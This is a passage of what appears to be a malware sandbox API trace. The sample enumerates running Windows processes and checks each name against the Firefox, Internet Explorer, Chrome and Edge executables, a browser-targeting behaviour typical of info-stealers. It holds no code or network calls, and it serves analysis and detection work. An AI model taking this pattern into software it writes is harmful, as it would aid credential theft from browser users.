lpString2="firefox.exe") returned 1 [0250.500] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.500] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.501] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.501] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.501] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.501] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.501] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.501] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.501] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0250.502] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0250.502] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0250.502] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0250.502] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.502] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.502] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.502] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.502] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.502] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.502] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.503] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.503] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.503] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.503] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.503] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0250.503] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0250.503] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0250.503] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0250.503] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.503] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0250.504] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0250.504] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0250.504] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0250.504] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.504] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0250.504] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0250.504] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0250.505] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0250.505] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.505] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.505] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.505] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.505] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.505] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.505] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0250.506] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0250.506] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0250.506] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0250.506] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.506] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0250.506] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0250.506] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0250.506] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0250.506] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.506] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0250.507] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0250.507] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0250.507] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0250.507] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.507] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0250.507] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0250.507] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0250.507] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0250.507] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.507] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0250.508] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0250.508] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0250.508] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0250.508] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.508] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0250.508] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0250.509] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0250.509] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0250.509] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.509] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0250.509] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0250.509] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0250.509] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0250.509] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.509] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0250.510] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0250.510] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0250.510] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0250.510] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.510] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0250.510] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0250.510] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0250.510] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0250.510] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.510] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0250.511] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0250.511] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0250.511] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0250.511] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.511] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0250.511] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0250.511] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0250.511] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0250.511] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.511] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0250.512] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0250.512] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0250.512] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0250.512] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.512] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0250.512] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0250.513] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0250.513] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0250.513] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.513] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0250.513] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0250.513] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0250.513] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0250.513] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.513] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0250.514] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0250.514] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0250.514] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0250.514] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.514] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0250.514] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0250.514] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0250.514] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0250.514] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.514] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0250.515] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0250.515] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0250.515] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0250.515] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.515] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0250.515] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0250.515] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0250.515] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0250.515] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.515] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0250.516] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0250.516] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0250.516] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0250.516] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.516] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0250.517] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0250.517] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0250.517] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0250.517] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.517] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0250.517] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0250.517] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0250.517] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0250.517] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.517] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0250.518] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0250.518] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0250.518] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0250.518] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.518] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.518] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0250.518] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0250.518] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0250.518] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.518] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.519] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.519] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.519] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.519] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.519] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0250.519] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0250.519] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0250.519] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0250.519] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.520] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.520] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.520] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.520] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.520] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.520] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0250.521] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0250.521] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0250.521] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0250.521] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.521] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.521] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0250.521] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0250.521] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0250.521] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.521] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0250.522] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0250.522] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0250.522] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0250.522] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.522] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.522] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0250.522] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0250.522] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0250.522] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.522] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.523] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0250.523] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0250.523] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0250.523] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.523] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.523] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0250.523] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0250.523] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0250.524] lstrcmpiA (lpString1="explorer.exe", 